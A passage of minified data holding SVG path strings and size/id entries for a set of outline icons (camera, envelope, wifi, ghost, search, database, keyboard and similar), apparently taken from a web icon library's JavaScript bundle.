0c-30.2 0-58.7-14.2-76.8-38.4L130.4 171.2C121.3 159.1 107.1 152 92 152l-68 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l68 0c30.2 0 58.7 14.2 76.8 38.4L317.6 340.8c9.1 12.1 23.3 19.2 38.4 19.2l74.1 0-39-39c-9.4-9.4-9.4-24.6 0-33.9z",{"w":395,"h":380,"d":19594},"M96 112c-8.8 0-16 7.2-16 16l0 256c0 8.8 7.2 16 16 16l256 0c8.8 0 16-7.2 16-16l0-256c0-8.8-7.2-16-16-16L96 112zM32 128c0-35.3 28.7-64 64-64l256 0c35.3 0 64 28.7 64 64l0 256c0 35.3-28.7 64-64 64L96 448c-35.3 0-64-28.7-64-64l0-256zm505.6-11.2c4.2-3.1 9.2-4.8 14.4-4.8 13.3 0 24 10.7 24 24l0 240c0 13.3-10.7 24-24 24-5.2 0-10.2-1.7-14.4-4.8l-73.6-55.2 0-60 64 48 0-144-64 48 0-60 73.6-55.2z",{"w":395,"h":380,"d":19596},"M112 64c0-8.8 7.2-16 16-16l288 0c8.8 0 16 7.2 16 16l0 48 48 0 0-48c0-35.3-28.7-64-64-64L128 0C92.7 0 64 28.7 64 64l0 160-38.4 0C11.5 224 0 235.5 0 249.6 0 306.2 45.8 352 102.4 352l153.6 0 0-48-153.6 0c-22.1 0-41.1-13.1-49.6-32l203.2 0 0-48-144 0 0-160zM368 464c-8.8 0-16-7.2-16-16l0-224c0-8.8 7.2-16 16-16l112 0c8.8 0 16 7.2 16 16l0 224c0 8.8-7.2 16-16 16l-112 0zm0-304c-35.3 0-64 28.7-64 64l0 224c0 35.3 28.7 64 64 64l112 0c35.3 0 64-28.7 64-64l0-224c0-35.3-28.7-64-64-64l-112 0zm40 224c-13.3 0-24 10.7-24 24s10.7 24 24 24l32 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-32 0z",{"w":395,"h":380,"d":19598},"M240 80l0 64 96 0 0-64-96 0zm-48 0c0-26.5 21.5-48 48-48l96 0c26.5 0 48 21.5 48 48l0 64c0 26.5-21.5 48-48 48l-24 0 0 40 240 0c13.3 0 24 10.7 24 24s-10.7 24-24 24l-112 0 0 40 24 0c26.5 0 48 21.5 48 48l0 64c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-64c0-26.5 21.5-48 48-48l24 0 0-40-208 0 0 40 24 0c26.5 0 48 21.5 48 48l0 64c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-64c0-26.5 21.5-48 48-48l24 0 0-40-112 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l240 0 0-40-24 0c-26.5 0-48-21.5-48-48l0-64zm16 288l-96 0 0 64 96 0 0-64zm160 0l0 64 96 0 0-64-96 0z",{"w":380,"h":380,"d":19600},"M109 108.9c81.2-81.2 212.9-81.2 294.2 0l27.1 27.1-78.2 0c-13.3 0-24 10.7-24 24s10.7 24 24 24l136.1 0c13.3 0 24-10.7 24-24l0-136c0-13.3-10.7-24-24-24s-24 10.7-24 24l0 78.1-27.1-27.1c-100-100-262.1-100-362 0-43.2 43.2-67.8 98.1-73.6 154.5-1.4 13.2 8.2 25 21.4 26.3s25-8.2 26.3-21.4C54 188.6 73.9 144.1 109 108.9zM510.7 282.5c1.4-13.2-8.2-25-21.4-26.3s-25 8.2-26.3 21.4c-4.7 45.8-24.7 90.4-59.8 125.5-81.2 81.2-212.9 81.2-294.2 0l-27.1-27.1 78.2 0c13.3 0 24-10.7 24-24s-10.7-24-24-24L24 328c-13.3 0-24 10.7-24 24L0 488c0 13.3 10.7 24 24 24s24-10.7 24-24l0-78.1 27.1 27.1c100 100 262.1 100 362 0 43.2-43.2 67.8-98.1 73.6-154.5z",{"w":380,"h":380,"d":19602},"M448 112c8.8 0 16 7.2 16 16l0 32-416 0 0-32c0-8.8 7.2-16 16-16l384 0zm16 112l0 160c0 8.8-7.2 16-16 16L64 400c-8.8 0-16-7.2-16-16l0-160 416 0zM64 64C28.7 64 0 92.7 0 128L0 384c0 35.3 28.7 64 64 64l384 0c35.3 0 64-28.7 64-64l0-256c0-35.3-28.7-64-64-64L64 64zM80 344c0 13.3 10.7 24 24 24l48 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-48 0c-13.3 0-24 10.7-24 24zm144 0c0 13.3 10.7 24 24 24l64 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-64 0c-13.3 0-24 10.7-24 24z",{"w":395,"h":380,"d":19604},"M40.9 181.4C104.4 118.7 191.7 80 288.1 80s183.6 38.7 247.2 101.4c9.4 9.3 24.6 9.2 33.9-.2s9.2-24.6-.2-33.9C496.8 76 397.5 32 288.1 32S79.3 76 7.1 147.3c-9.4 9.3-9.5 24.5-.2 33.9s24.5 9.5 33.9 .2zM288.1 256c53.6 0 101.6 23.9 133.9 61.7 8.6 10.1 23.8 11.3 33.8 2.7s11.3-23.8 2.7-33.8c-41-48-102.2-78.6-170.4-78.6s-129.3 30.5-170.4 78.6c-8.6 10.1-7.4 25.2 2.7 33.8s25.2 7.4 33.8-2.7c32.3-37.8 80.3-61.7 133.9-61.7zm48 176a48 48 0 1 0 -96 0 48 48 0 1 0 96 0z",{"w":398,"h":380,"d":19606},"M48 192l0 223.5c26.3-4.9 54.6 3.7 73.6 25.5l6.4 7.3 3.8-4.3c31.9-36.4 88.5-36.4 120.4 0l3.8 4.3 6.4-7.3c19-21.8 47.3-30.4 73.6-25.5L336 192c0-79.5-64.5-144-144-144S48 112.5 48 192zM256 512c-5.1 0-9.9-2.2-13.3-6l-26.6-30.5c-12.7-14.6-35.4-14.6-48.2 0L141.3 506c-3.3 3.8-8.2 6-13.3 6s-9.9-2.2-13.3-6L85.5 472.5c-11.6-13.3-32.1-14-44.5-1.5l-2.3 2.3c-4.2 4.2-10 6.6-16 6.6-12.5 0-22.6-10.1-22.6-22.6L0 192C0 86 86 0 192 0S384 86 384 192l0 265.4c0 12.5-10.1 22.6-22.6 22.6-6 0-11.8-2.4-16-6.6l-2.3-2.3c-12.5-12.5-32.9-11.8-44.5 1.5L269.3 506c-3.3 3.8-8.2 6-13.3 6zM96 192a32 32 0 1 1 64 0 32 32 0 1 1 -64 0zm128 0a32 32 0 1 1 64 0 32 32 0 1 1 -64 0z",{"w":380,"h":380,"d":19608},"M61.4 64C27.5 64 0 91.5 0 125.4 0 126.3 0 127.1 .1 128L0 128 0 384c0 35.3 28.7 64 64 64l384 0c35.3 0 64-28.7 64-64l0-256-.1 0c0-.9 .1-1.7 .1-2.6 0-33.9-27.5-61.4-61.4-61.4L61.4 64zM464 192.3L464 384c0 8.8-7.2 16-16 16L64 400c-8.8 0-16-7.2-16-16l0-191.7 154.8 117.4c31.4 23.9 74.9 23.9 106.4 0L464 192.3zM48 125.4C48 118 54 112 61.4 112l389.2 0c7.4 0 13.4 6 13.4 13.4 0 4.2-2 8.2-5.3 10.7L280.2 271.5c-14.3 10.8-34.1 10.8-48.4 0L53.3 136.1c-3.3-2.5-5.3-6.5-5.3-10.7z",{"w":380,"h":380,"d":19610},"M256 32c9.5 0 18 5.5 21.9 14.2L451.1 432 472 432c13.3 0 24 10.7 24 24s-10.7 24-24 24l-96 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l22.5 0-35.9-80-213.2 0-35.9 80 22.5 0c13.3 0 24 10.7 24 24s-10.7 24-24 24l-96 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l20.9 0 173.2-385.8C238 37.5 246.5 32 256 32zm0 82.6L171 304 341 304 256 114.6z",{"w":380,"h":380,"d":19612},"M51.9 384.9C19.3 344.6 0 294.4 0 240 0 107.5 114.6 0 256 0S512 107.5 512 240 397.4 480 256 480c-36.5 0-71.2-7.2-102.6-20L37 509.9c-3.7 1.6-7.5 2.1-11.5 2.1-14.1 0-25.5-11.4-25.5-25.5 0-4.3 1.1-8.5 3.1-12.2l48.8-89.4zm37.3-30.2c12.2 15.1 14.1 36.1 4.8 53.2l-18 33.1 58.5-25.1c11.8-5.1 25.2-5.2 37.1-.3 25.7 10.5 54.2 16.4 84.3 16.4 117.8 0 208-88.8 208-192S373.8 48 256 48 48 136.8 48 240c0 42.8 15.1 82.4 41.2 114.7z",{"w":379,"h":380,"d":19614},"M49.1 204.2C58.9 116.3 133.5 48 224 48s165.1 68.3 174.9 156.2C385 196.4 369 192 352 192l-16 0c-26.5 0-48 21.5-48 48l0 96c0 26.5 21.5 48 48 48l16 0c17.5 0 33.9-4.7 48-12.8l0 20.9c0 39.8-32.3 72-72 72l-40 0 0 0c0-26.5-21.5-48-48-48l-32 0c-26.5 0-48 21.5-48 48s21.5 48 48 48c44 0 36 0 119.9 .1 66.3 0 120.1-53.7 120.1-120L448 224C448 100.3 347.7 0 224 0S0 100.3 0 224l0 64c0 53 43 96 96 96l16 0c26.5 0 48-21.5 48-48l0-96c0-26.5-21.5-48-48-48l-16 0c-17 0-33 4.4-46.9 12.2zM352 240c26.5 0 48 21.5 48 48s-21.5 48-48 48l-16 0 0-96 16 0zM48 288c0-26.5 21.5-48 48-48l16 0 0 96-16 0c-26.5 0-48-21.5-48-48z",{"w":379,"h":380,"d":19616},"M48 80l0 96 96 0 0-96-96 0zM0 80C0 53.5 21.5 32 48 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48L0 80zM48 336l0 96 96 0 0-96-96 0zM0 336c0-26.5 21.5-48 48-48l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96zM400 80l-96 0 0 96 96 0 0-96zM304 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96c0-26.5 21.5-48 48-48zm0 304l0 96 96 0 0-96-96 0zm-48 0c0-26.5 21.5-48 48-48l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96z",{"w":379,"h":380,"d":19618},"M400 86l0 88.7c-13.3 7.2-31.6 14.2-54.8 19.9-34 8.4-75.7 13.4-121.2 13.4s-87.3-5-121.2-13.4C79.6 188.9 61.3 182 48 174.7l0-88.7 .6-.5C53.9 81 64.5 74.8 81.8 68.6 115.9 56.5 166.2 48 224 48s108.1 8.5 142.2 20.6c17.3 6.2 27.8 12.4 33.2 16.9l.6 .5zM400 426l-.6 .5c-5.3 4.5-15.9 10.7-33.2 16.9-34.1 12.2-84.4 20.6-142.2 20.6s-108.1-8.5-142.2-20.6c-17.3-6.2-27.8-12.4-33.2-16.9l-.6-.5 0-70.4c13.3 5.3 27.9 9.9 43.3 13.7 38.2 9.4 83.9 14.8 132.7 14.8s94.5-5.4 132.7-14.8c15.4-3.8 30-8.3 43.3-13.7l0 70.4zm0-123.3c-13.3 7.2-31.6 14.2-54.8 19.9-34 8.4-75.7 13.4-121.2 13.4s-87.3-5-121.2-13.4C79.6 316.9 61.3 310 48 302.7l0-75.2c13.3 5.3 27.9 9.9 43.3 13.7 38.2 9.4 83.9 14.8 132.7 14.8s94.5-5.4 132.7-14.8c15.4-3.8 30-8.3 43.3-13.7l0 75.2zM448 432l0-352C448 35.8 347.7 0 224 0S0 35.8 0 80L0 432c0 44.2 100.3 80 224 80s224-35.8 224-80z",{"w":398,"h":380,"d":19620},"M64 48l112 0 0 88c0 39.8 32.2 72 72 72l88 0 0 240c0 8.8-7.2 16-16 16L64 464c-8.8 0-16-7.2-16-16L48 64c0-8.8 7.2-16 16-16zM224 67.9l92.1 92.1-68.1 0c-13.3 0-24-10.7-24-24l0-68.1zM64 0C28.7 0 0 28.7 0 64L0 448c0 35.3 28.7 64 64 64l256 0c35.3 0 64-28.7 64-64l0-261.5c0-17-6.7-33.3-18.7-45.3L242.7 18.7C230.7 6.7 214.5 0 197.5 0L64 0zM259.9 268.1c-9.4-9.4-24.6-9.4-33.9 0l-33.9 33.9-33.9-33.9c-9.4-9.4-24.6-9.4-33.9 0s-9.4 24.6 0 33.9l33.9 33.9-33.9 33.9c-9.4 9.4-9.4 24.6 0 33.9s24.6 9.4 33.9 0l33.9-33.9 33.9 33.9c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9l-33.9-33.9 33.9-33.9c9.4-9.4 9.4-24.6 0-33.9z",{"w":379,"h":380,"d":19622},"M120-32c13.3 0 24 10.7 24 24l0 104 160 0 0-104c0-13.3 10.7-24 24-24s24 10.7 24 24l0 104 72 0c13.3 0 24 10.7 24 24s-10.7 24-24 24l-8 0 0 80c0 97.9-73.3 178.7-168 190.5l0 73.5c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-73.5C105.3 402.7 32 321.9 32 224l0-80-8 0c-13.3 0-24-10.7-24-24S10.7 96 24 96L96 96 96-8c0-13.3 10.7-24 24-24zM80 144l0 80c0 79.5 64.5 144 144 144s144-64.5 144-144l0-80-288 0z",{"w":380,"h":380,"d":19624},"M64 112c-8.8 0-16 7.2-16 16l0 256c0 8.8 7.2 16 16 16l384 0c8.8 0 16-7.2 16-16l0-256c0-8.8-7.2-16-16-16L64 112zM0 128C0 92.7 28.7 64 64 64l384 0c35.3 0 64 28.7 64 64l0 256c0 35.3-28.7 64-64 64L64 448c-35.3 0-64-28.7-64-64L0 128zm144 96l0 32 48 0 0-32c0-8.8-7.2-16-16-16l-16 0c-8.8 0-16 7.2-16 16zm48 104l0-24-48 0 0 24c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-104c0-35.3 28.7-64 64-64l16 0c35.3 0 64 28.7 64 64l0 104c0 13.3-10.7 24-24 24s-24-10.7-24-24zM416 184l0 144c0 13.3-10.7 24-24 24-7.1 0-13.5-3.1-17.9-8-10.2 5.1-21.8 8-34.1 8-42 0-76-34-76-76s34-76 76-76c9.9 0 19.3 1.9 28 5.3l0-21.3c0-13.3 10.7-24 24-24s24 10.7 24 24zm-76 64a28 28 0 1 0 0 56 28 28 0 1 0 0-56z",{"w":395,"h":380,"d":19626},"M41-24.9c-9.4-9.4-24.6-9.4-33.9 0S-2.3-.3 7 9.1l528 528c9.4 9.4 24.6 9.4 33.9 0s9.4-24.6 0-33.9L452.1 386.3c58.5-83.9 75.6-182.2 75.9-246.3 .1-26.2-16.3-47.9-38.3-57.2L301.4 2.9C297.2 1 292.7 0 288 0s-9.2 1-13.4 2.9L130.1 64.2 41-24.9zM166.7 100.8L288 49.4 471 127c5.9 2.5 9.1 7.8 9 12.8-.3 57.2-15.2 140.3-62.5 211.9L166.7 100.8zM352.9 422.8c-17.4 14-37.1 26.5-59.2 37.1-3.6 1.7-7.8 1.7-11.3 0-134.2-64.2-177.9-200-185.2-292.9L51 120.8c-2 6-3 12.4-3 19.2 .5 99.2 41.3 280.7 213.6 363.2 16.7 8 36.1 8 52.8 0 27.5-13.1 51.6-28.8 72.7-46.2l-34.2-34.2z",{"w":380,"h":380,"d":19628},"M48 256l0 128c0 8.8 7.2 16 16 16l384 0c8.8 0 16-7.2 16-16l0-128-416 0zM0 128C0 92.7 28.7 64 64 64l384 0c35.3 0 64 28.7 64 64l0 256c0 35.3-28.7 64-64 64L64 448c-35.3 0-64-28.7-64-64L0 128zm128 32a32 32 0 1 0 -64 0 32 32 0 1 0 64 0zm56-24c-13.3 0-24 10.7-24 24s10.7 24 24 24l240 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-240 0z",{"w":379,"h":380,"d":19630},"M224 0c-13.3 0-24 10.7-24 24l0 9.7C118.6 45.3 56 115.4 56 200l0 14.5c0 37.7-10 74.7-29 107.3L5.1 359.2C1.8 365 0 371.5 0 378.2 0 399.1 16.9 416 37.8 416l372.4 0c20.9 0 37.8-16.9 37.8-37.8 0-6.7-1.8-13.3-5.1-19L421 321.7c-19-32.6-29-69.6-29-107.3l0-14.5c0-84.6-62.6-154.7-144-166.3l0-9.7c0-13.3-10.7-24-24-24zM392.4 368l-336.9 0 12.9-22.1C91.7 306 104 260.6 104 214.5l0-14.5c0-66.3 53.7-120 120-120s120 53.7 120 120l0 14.5c0 46.2 12.3 91.5 35.5 131.4L392.4 368zM156.1 464c9.9 28 36.6 48 67.9 48s58-20 67.9-48l-135.8 0zM136 224c0 13.3 10.7 24 24 24l40 0 0 40c0 13.3 10.7 24 24 24s24-10.7 24-24l0-40 40 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-40 0 0-40c0-13.3-10.7-24-24-24s-24 10.7-24 24l0 40-40 0c-13.3 0-24 10.7-24 24z",{"w":380,"h":380,"d":19632},"M73.1 127L256 49.4 439 127c5.9 2.5 9.1 7.8 9 12.8-.4 91.4-38.4 249.3-186.3 320.1-3.6 1.7-7.8 1.7-11.3 0-148-70.8-185.9-228.7-186.4-320.1 0-5 3.1-10.2 9-12.8zM457.8 82.8L269.4 2.9C265.2 1 260.7 0 256 0s-9.2 1-13.4 2.9L54.3 82.8c-22 9.3-38.4 31-38.3 57.2 .5 99.2 41.3 280.7 213.6 363.2 16.7 8 36.1 8 52.8 0 172.4-82.5 213.1-264 213.6-363.2 .1-26.2-16.3-47.9-38.3-57.2zM184 216c-13.3 0-24 10.7-24 24s10.7 24 24 24l144 0c13.3 0 24-10.7 24-24s-10.7-24-24-24l-144 0z",{"w":379,"h":380,"d":19634},"M48 80l0 96 96 0 0-96-96 0zM0 80C0 53.5 21.5 32 48 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48L0 80zM48 336l0 96 96 0 0-96-96 0zM0 336c0-26.5 21.5-48 48-48l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96zM400 80l-96 0 0 96 96 0 0-96zM304 32l96 0c26.5 0 48 21.5 48 48l0 96c0 26.5-21.5 48-48 48l-96 0c-26.5 0-48-21.5-48-48l0-96c0-26.5 21.5-48 48-48zM288 352a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm0 64c17.7 0 32 14.3 32 32s-14.3 32-32 32-32-14.3-32-32 14.3-32 32-32zm96 32c0-17.7 14.3-32 32-32s32 14.3 32 32-14.3 32-32 32-32-14.3-32-32zm32-96a32 32 0 1 1 0-64 32 32 0 1 1 0 64zm-32 32a32 32 0 1 1 -64 0 32 32 0 1 1 64 0z",{"w":380,"h":380,"d":19636},"M336 48c8.8 0 16 7.2 16 16l0 112 48 0 0-112c0-35.3-28.7-64-64-64L176 0c-35.3 0-64 28.7-64 64l0 112 48 0 0-112c0-8.8 7.2-16 16-16l32 0 0 56c0 13.3 10.7 24 24 24l48 0c13.3 0 24-10.7 24-24l0-56 32 0zM315.9 512L448 512c35.3 0 64-28.7 64-64l0-160c0-35.3-28.7-64-64-64l-132.1 0c12.7 18.1 20.1 40.2 20.1 64l0 62.6c2.5 .9 5.2 1.4 8 1.4l48 0c13.3 0 24-10.7 24-24l0-56 32 0c8.8 0 16 7.2 16 16l0 160c0 8.8-7.2 16-16 16l-113.1 0c-2.5 17.7-9.2 34-18.9 48zM240 288l0 160c0 0 0 0 0 .1 0 8.8-7.2 15.9-16 15.9L64 464c-8.8 0-16-7.2-16-16l0-160c0-8.8 7.2-16 16-16l32 0 0 56c0 13.3 10.7 24 24 24l48 0c13.3 0 24-10.7 24-24l0-56 32 0c8.8 0 15.9 7.1 16 15.9l0 .1zM64 224c-35.3 0-64 28.7-64 64L0 448c0 35.3 28.7 64 64 64l160 0c35.3 0 64-28.7 64-64l0-160c0-35.3-28.7-64-64-64L64 224z",{"w":379,"h":380,"d":19638},"M102.4 101.6L148.5 7.2C150.6 2.8 155.1 0 160 0s9.4 2.8 11.5 7.2l46.1 94.4c4.2 8.6 6.4 18 6.4 27.6 0 34.7-28.1 62.8-62.8 62.8l-2.4 0c-34.7 0-62.8-28.1-62.8-62.8 0-9.6 2.2-19 6.4-27.6zm-96 224l46.1-94.4c2.1-4.4 6.6-7.2 11.5-7.2s9.4 2.8 11.5 7.2l46.1 94.4c4.2 8.6 6.4 18 6.4 27.6 0 34.7-28.1 62.8-62.8 62.8l-2.4 0c-34.7 0-62.8-28.1-62.8-62.8 0-9.6 2.2-19 6.4-27.6zM320 160c5 0 9.6 2.6 12.2 6.8l14.7 24 1.2 2 0 0 81.8 133.3c11.8 19.2 18 41.3 18 63.8 0 67.4-54.6 122-122 122l-12 0c-67.4 0-122-54.6-122-122 0-22.5 6.2-44.6 18-63.8l81.8-133.3 0 0 1.2-2 14.7-24c2.6-4.2 7.2-6.8 12.2-6.8zM250.9 351.3c-7.1 11.6-10.9 25-10.9 38.7 0 40.9 33.1 74 74 74l12 0c40.9 0 74-33.1 74-74 0-13.7-3.8-27.1-10.9-38.7L320 238.7 250.9 351.3z",{"w":395,"h":380,"d":19640},"M180.8 303.7c9.2 10.4 19.4 20.6 30.7 30.1 33.7 28.5 76 50.2 124.5 50.2s90.8-21.8 124.5-50.2c30.3-25.5 52.7-55.7 65.3-77.8-12.6-22.1-35-52.2-65.3-77.8-33.7-28.5-76-50.2-124.5-50.2s-90.8 21.7-124.5 50.2c-11.3 9.5-21.5 19.7-30.7 30.1-14 15.8-36.7 20.6-56 11.8l-54.3-24.9 21.1 36.9c8.4 14.8 8.4 32.9 0 47.6l-21.1 36.9 54.3-24.9c19.2-8.8 41.9-4 56 11.8zM4.2 336.1L50 256 4.2 175.9c-6.9-12.1-5.2-27.2 4.2-37.5s24.3-13.3 36.9-7.5l99.5 45.6c10.5-11.9 22.5-23.8 35.7-35 39.2-33.1 92-61.5 155.5-61.5s116.3 28.5 155.5 61.5c39.1 33 66.9 72.4 81 99.8 4.7 9.2 4.7 20.1 0 29.3-14.1 27.4-41.9 66.8-81 99.8-39.2 33.1-92 61.5-155.5 61.5s-116.3-28.5-155.5-61.5c-13.2-11.2-25.1-23.1-35.7-35L45.3 381.1c-12.6 5.8-27.6 2.8-36.9-7.5s-11.1-25.4-4.2-37.5zM416 224a32 32 0 1 1 0 64 32 32 0 1 1 0-64z",{"w":380,"h":380,"d":19642},"M368 208a160 160 0 1 0 -320 0 160 160 0 1 0 320 0zM337.1 371.1C301.7 399.2 256.8 416 208 416 93.1 416 0 322.9 0 208S93.1 0 208 0 416 93.1 416 208c0 48.8-16.8 93.7-44.9 129.1L505 471c9.4 9.4 9.4 24.6 0 33.9s-24.6 9.4-33.9 0L337.1 371.1z",{"w":380,"h":380,"d":19644},"M0 64C0 28.7 28.7 0 64 0l72 0c13.3 0 24 10.7 24 24s-10.7 24-24 24L64 48c-8.8 0-16 7.2-16 16l0 72c0 13.3-10.7 24-24 24S0 149.3 0 136L0 64zM352 24c0-13.3 10.7-24 24-24l72 0c35.3 0 64 28.7 64 64l0 72c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-72c0-8.8-7.2-16-16-16l-72 0c-13.3 0-24-10.7-24-24zM24 352c13.3 0 24 10.7 24 24l0 72c0 8.8 7.2 16 16 16l72 0c13.3 0 24 10.7 24 24s-10.7 24-24 24l-72 0c-35.3 0-64-28.7-64-64l0-72c0-13.3 10.7-24 24-24zm464 0c13.3 0 24 10.7 24 24l0 72c0 35.3-28.7 64-64 64l-72 0c-13.3 0-24-10.7-24-24s10.7-24 24-24l72 0c8.8 0 16-7.2 16-16l0-72c0-13.3 10.7-24 24-24zM96 160c0-17.7 14.3-32 32-32s32 14.3 32 32l0 192c0 17.7-14.3 32-32 32s-32-14.3-32-32l0-192zm200-32c13.3 0 24 10.7 24 24l0 208c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-208c0-13.3 10.7-24 24-24zm56 32c0-17.7 14.3-32 32-32s32 14.3 32 32l0 192c0 17.7-14.3 32-32 32s-32-14.3-32-32l0-192zM208 128c8.8 0 16 7.2 16 16l0 224c0 8.8-7.2 16-16 16s-16-7.2-16-16l0-224c0-8.8 7.2-16 16-16z",{"w":379,"h":380,"d":19646},"M147.5 320l12.6-138.2c1.2-13.2 12.9-22.9 26.1-21.7s22.9 12.9 21.7 26.1L195.7 320 358.8 320 328 93.8c-1.1-7.9-7.8-13.8-15.9-13.8L135.9 80c-8 0-14.8 5.9-15.9 13.8L89.2 320 147.5 320zm228-232.6l31.8 233.2c23 3.5 40.6 23.4 40.6 47.4l0 64c0 26.5-21.5 48-48 48L48 480c-26.5 0-48-21.5-48-48l0-64c0-24 17.6-43.9 40.7-47.4L72.5 87.4C76.8 55.6 103.9 32 135.9 32l176.3 0c32 0 59.1 23.6 63.4 55.4zM400 368l-352 0 0 64 352 0 0-64z",{"w":380,"h":380,"d":19648},"M240.5 64.6c-12-1.7-24.3 .5-35.1 6.2l-74 39.5C120.7 116 112 125 106.6 136L69.9 211.6c-5.4 11-7.1 23.5-5 35.6L79.4 330c2.1 12.1 8 23.2 16.8 31.7l60.3 58.4c8.8 8.5 20 14 32 15.7l83 11.7c12 1.7 24.3-.5 35.1-6.2l74-39.5C391.3 396 400 387 405.4 376l36.7-75.5c5.4-11 7.1-23.5 5-35.6L432.6 182c-2.1-12.1-8-23.2-16.8-31.7L355.5 91.9c-8.8-8.5-20-14-32-15.7l-83-11.7zM182.8 28.4c19.7-10.5 42.3-14.5 64.4-11.4l83 11.7c22.1 3.1 42.7 13.2 58.7 28.7l60.3 58.4c16.1 15.6 26.8 35.8 30.7 57.9l14.6 82.8c3.9 22.1 .7 44.8-9.1 64.9L448.6 397c-9.8 20.1-25.7 36.6-45.4 47.2l-74 39.5c-19.7 10.5-42.3 14.5-64.4 11.4l-83-11.7c-22.1-3.1-42.7-13.2-58.7-28.7L62.8 396.2C46.8 380.6 36 360.3 32.2 338.3L17.6 255.5c-3.9-22.1-.7-44.8 9.1-64.9L63.4 115c9.8-20.1 25.7-36.6 45.4-47.2l74-39.5zM208 144a32 32 0 1 1 0 64 32 32 0 1 1 0-64zM176 304a32 32 0 1 1 0 64 32 32 0 1 1 0-64zm128 0a32 32 0 1 1 64 0 32 32 0 1 1 -64 0z",{"w":17,"h":380,"d":19650},"M320 192a64 64 0 1 0 0-128 64 64 0 1 0 0 128zm0-176a112 112 0 1 1 0 224 112 112 0 1 1 0-224zM296 336c-57.4 0-104 46.6-104 104l0 16c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-16c0-83.9 68.1-152 152-152l48 0c83.9 0 152 68.1 152 152l0 16c0 13.3-10.7 24-24 24s-24-10.7-24-24l0-16c0-57.4-46.6-104-104-104l-48 0zm135.4-93.2c11.7-11.3 21.6-24.4 29.4-38.8 5.9 2.6 12.4 4 19.2 4 26.5 0 48-21.5 48-48s-21.5-48-48-48l-.8 0c-1.6-16.6-5.8-32.4-12.1-47.1 4.2-.6 8.6-.9 12.9-.9 53 0 96 43 96 96s-43 96-96 96c-17.7 0-34.3-4.8-48.6-13.2zM160 64c4.4 0 8.7 .3 12.9 .9-6.3 14.7-10.5 30.6-12.1 47.1l-.8 0c-26.5 0-48 21.5-48 48s21.5 48 48 48c6.8 0 13.3-1.4 19.2-4 7.8 14.4 17.7 27.5 29.4 38.8-14.2 8.4-30.8 13.2-48.6 13.2-53 0-96-43-96-96s43-96 96-96zM149.3 304c-15.1 16.3-27.5 35-36.5 55.6-38 15.5-64.8 52.8-64.8 96.4 0 13.3-10.7 24-24 24S0 469.3 0 456c0-83.1 66.6-150.6 149.3-152zm377.9 55.6c-9-20.6-21.5-39.4-36.5-55.6 82.7 1.4 149.3 68.9 149.3 152 0 13.3-10.7 24-24 24s-24-10.7-24-24c0-43.6-26.8-80.9-64.8-96.4z",{"w":395,"h":380,"d":19652},"M96 48l112 0 0 88c0 39.8 32.2 72 72 72l99.3 0c10.8-9.5 23.1-17.2 36.7-22.7-.3-16.5-7-32.3-18.7-44.1L274.7 18.7C262.7 6.7 246.5 0 229.5 0L96 0C60.7 0 32 28.7 32 64l0 384c0 35.3 28.7 64 64 64l209.3 0c-.9-5.2-1.3-10.6-1.3-16.1l0-31.9-208 0c-8.8 0-16-7.2-16-16L80 64c0-8.8 7.2-16 16-16zM256 67.9l92.1 92.1-68.1 0c-13.3 0-24-10.7-24-24l0-68.1zM496 304.1l0 47.9-64 0 0-47.9c0-17.7 14.3-32 32-32s32 14.3 32 32zM352 400l0 96c0 26.5 21.5 48 48 48l128 0c26.5 0 48-21.5 48-48l0-96c0-20.9-13.4-38.7-32-45.3l0-50.6c0-44.2-35.8-80-80-80s-80 35.8-80 80l0 50.6c-18.6 6.6-32 24.4-32 45.3z",{"w":395,"h":380,"d":19654},"M64 112c-8.8 0-16 7.2-16 16l0 256c0 8.8 7.2 16 16 16l448 0c8.8 0 16-7.2 16-16l0-256c0-8.8-7.2-16-16-16L64 112zM0 128C0 92.7 28.7 64 64 64l448 0c35.3 0 64 28.7 64 64l0 256c0 35.3-28.7 64-64 64L64 448c-35.3 0-64-28.7-64-64L0 128zM176 320l224 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-224 0c-8.8 0-16-7.2-16-16l0-16c0-8.8 7.2-16 16-16zm-72-72c0-8.8 7.2-16 16-16l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16zm16-96l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16c0-8.8 7.2-16 16-16zm64 96c0-8.8 7.2-16 16-16l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16zm16-96l16 0c8.8 0 16 7.2 16 16l0 16c0 8.8-7.2 16-16 16l-16 0c-8.8 0-16-7.2-16-16l0-16c0-8.8 7.2-16 16-16zm64 96c0-8.8 7.2-16 16-16l16 0c8.8 0 16 7.2 16 16l0 16c0 